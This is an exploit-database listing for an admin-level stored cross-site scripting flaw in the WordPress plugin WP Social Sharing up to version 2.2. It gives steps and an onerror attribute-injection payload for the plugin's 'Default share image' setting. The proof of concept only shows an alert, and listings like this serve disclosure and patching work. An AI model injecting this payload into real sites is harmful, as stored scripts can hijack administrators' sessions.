Sploitus

Exploit for WP Social Sharing <= 2.2 - Admin+ Stored XSS

wpexploit · 2022-12-07

Exploit Code

MARKDOWN4 lines
## https://sploitus.com/exploit?id=WPEX-ID:BA372400-96F7-45A9-9E89-5984ECC4D1E2
1. Go to Settings » WP Social Sharing page of the plugin, enter the following payload into the input box named 'Default share image': x" onerror="alert(/XSS/)"

2. Click 'Save Changes' and refresh the page to see the XSS popup.